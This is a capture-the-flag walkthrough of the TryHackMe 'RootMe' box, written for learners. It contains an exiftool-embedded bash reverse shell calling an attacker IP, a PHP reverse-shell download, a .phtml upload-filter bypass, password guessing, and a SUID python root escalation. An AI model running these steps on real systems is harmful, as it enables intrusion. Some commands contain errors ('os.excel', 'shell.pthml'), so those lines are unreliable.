TryHackMe RootMe

Today we are going to tackle RootMe, this is a beginner level ctf on TryHackMe.  Let’s start off with our favorite port scanner Nmap.

nmap -p- -T4 –reason

Now let’s do service enumeration against the ports that we found open.

nmap -sV -T4 –reason -p <targetIP>

Based on the results from our Nmap scan we know 2 ports are opened and the version of Apache running is 2.4.29.  We can also look at the headers of the website to the version of Apache running.  Open the web server in a browser, right click, and then click Inspect Element.  Next, click on the Network tab, refresh the page, and click on the File /.  Then under the Server header you can see the web server is running Apache 2.4.29. This means the developers just left the default options for the headers. It is possible that a developer could change this Server header to a false software version or even display nothing at all. It is always recommend to not display anything to avoid attackers being able to identify the underlying technology being used for the web server.

Now since we know that port 80 is running an Apache web server, let’s enumerate the web server using directory busting.  We can use a tool called Gobuster to find the directories on the web server.  This tool attempts to visit sites based off a wordlist.  So basically for every word in a wordlist we try to visit http://<TargetIP>/WORD. Based on the HTTP response we will know whether or not a directory exists.

gobuster dir -u http://10.10.41.87 -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt

-u – is for url

-w – is for which wordlist to use.

Pretty quickly we find a few different sites, /uploads, /js, and /css.  The uploads directory sounds interesting, so let’s visit that.

Well it doesn’t look like we can use this page to easily upload files.  Luckily we also find a webpage called panel, which gives us an option to upload files!

Maybe we can upload a PHP reverse shell, since this is an Apache server, PHP should run without any issues.  There is a great PHP reverse shell located at https://github.com/pentestmonkey/php-reverse-shell.

We can simply download this file and then change the $ip and $port options what our choosing, we will use our attacker machine’s IP address and a port of our choosing to catch the reverse shell.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

nano php-reverse-shell.php 

Here we change the parameters for our attacker machine IP address and listening port number.

Now we upload this to the target.

Well it looks like we aren’t able to upload php files to the website.  This is Portuguese for not allowed. Maybe we can inject our php shell code into a jpeg file within the exif data.  This is the data about the picture file, that gets stored within the file, which we are able to put in our own comments.

First we download a random jpeg off the internet, I used google images to search for hacker 🙂

Next, we use a tool called exiftool to create a reverse shell in the comments of the image. We use shell_exec within PHP to be able to run commands on the underlying system.

exiftool -Comment=”<?php shell_exec(\”/bin/bash -c ‘bash -i >& /dev/tcp/<AttackerIP>/1337 0>&1’\”);?>” hacker.jpeg

Now go upload the file at http://<targetIP>/panel and then try to visit it at http://10.10.41.87/uploads/hacker.jpeg

Sadly, we don’t seem to get any shell here so something is wrong.  There is a special file extension known as phtml.  This extension is HTML code with inline PHP processing instructions.  Maybe if we save our php shell as a phtml file we can get a reverse shell.

cp php-reverse-shell.php shell.pthml

Now if we reupload our file, visit the file, and check our Netcat listener we have a shell!

Let’s upgrade our shell to make it more functional. First I checked to see if we had python on the machine and it turns out we have python3 on the machine.

which python3

For gaining a tty with python3 I always reference https://netsec.ws/?p=337.  This shows us how to upgrade to a tty shell in various ways. A TTY is used by processes to access a specific terminal. When we upgrade to a TTY we can get additional functions within our new upgraded shell. For example, if you tried to run sudo -l to check for sudo privileges of a user, the command will fail because you don’t have a TTY shell.

The below command we are importing the library pty and then running pty.spawn to spawn a new process of /bin/bash.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Next we try to run sudo -l to list an sudo privileges, which sadly since we don’t have a password for www-data we can’t use this.

Before we get to carried away let’s search for the user.txt file to get one of our flags.

find / -name “user.txt” 2>/dev/null

Great the file is within /var/www/ so we can cat it out as any user due to the permissions set on the file. It happens that our user also owns the file, but if we were a different user we could still view user.txt.

Let’s check out to see what users are actually on the box.

cat /etc/passwd

This file is readable by anyone, allowing us to discover other users such as test.  Then I was able to guess the password of the test user, which was test.

Now we can simply ssh in as test to get a more reliable shell.

ssh test@<targetIP>

Password is test.

Now that we have a full shell we can try to check out sudo privileges.

sudo -l

Sadly this user can’t run sudo on the machine. No quick easy wins for root here.

Let’s look for any binaries that may run by root due to the SUID privileges.  To do this we can use the following command

find / -perm -u=s -type f 2>/dev/null

Here we use the find command and specify to start searching in the root directory, but then look in every other directory on the machine. This happens because every directory starts within the root directory. -perm is to search for specific bits that are set on the file and finally specify the type as regular file. Remember everything on Linux is a file.

Interesting, it looks like we can run python as sudo without needing to know the password, this most certainly should lead us to a root shell considering that’s how we spawned the TTY.  Now we can visit https://gtfobins.github.io to discover how to escalate our privileges within python.  It says we need to run the following command.

python -c ‘import os; os.excel(“/bin/sh”, “sh”, “-p”)’

In this case I changed it to /bin/bash because I like the bash shell better. Here we are running python code first importing the os library. Next we call os.excel which is used to execute a new program and replacing the current process. This means that we are running python as root and then replacing that process with /bin/bash giving us a root shell. The -p option is for priviliged which doesn’t attempt to reset the effective uid if it doesn’t match the current uid. Without this flag it is possible our permissions could get dropped to running as only our current user. This flag isn’t set by default to try and avoid privilege escalation via setuid programs.

Woohoo we have now escalated ourself to root, we can cat out our flag within root and we have completed this box! I hope you learned a lot, remember to try out .phtml files if you are trying to bypass a filter on file uploads!

Until next time keep on hacking!